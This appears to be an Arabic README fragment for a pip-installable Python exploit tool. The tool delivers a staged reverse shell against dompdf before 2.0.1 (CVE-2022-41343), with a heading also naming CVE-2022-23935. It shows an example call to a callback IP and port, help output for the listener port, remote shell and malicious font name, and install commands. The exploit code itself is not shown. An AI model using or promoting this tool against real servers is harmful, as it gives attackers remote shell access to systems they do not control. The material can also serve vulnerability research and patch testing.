
🐍 استغلال Python لـ CVE-2022-23935
🐍 استغلال Python لـ CVE-2022-41343
صدفة عكسية مرحلية لـ dompdf < 2.0.1
مبني على: تقرير Positive Sec و PoC
cve-2022-41343 10.10.16.3 44444
usage: cve-2022-41343 [-h] [-l SERVER_PORT] [-s SHELL] [-n FONT_NAME] ip port
positional arguments:
ip عنوان IP/مضيف استدعاء الصدفة
port منفذ استدعاء الصدفة
options:
-h, --help عرض رسالة المساعدة هذه والخروج
-l SERVER_PORT, --listen SERVER_PORT
منفذ استماع الخادم (الافتراضي: 55555)
-s SHELL, --shell SHELL
الصدفة البعيدة (الافتراضي: bash)
-n FONT_NAME, --font-name FONT_NAME
اسم خط الاستغلال (الافتراضي: comicsploitz)
python3 -m pip install cve-2022-41343
python3 -m pip install cve-2022-41343-1.0.0-py3-none-any.whl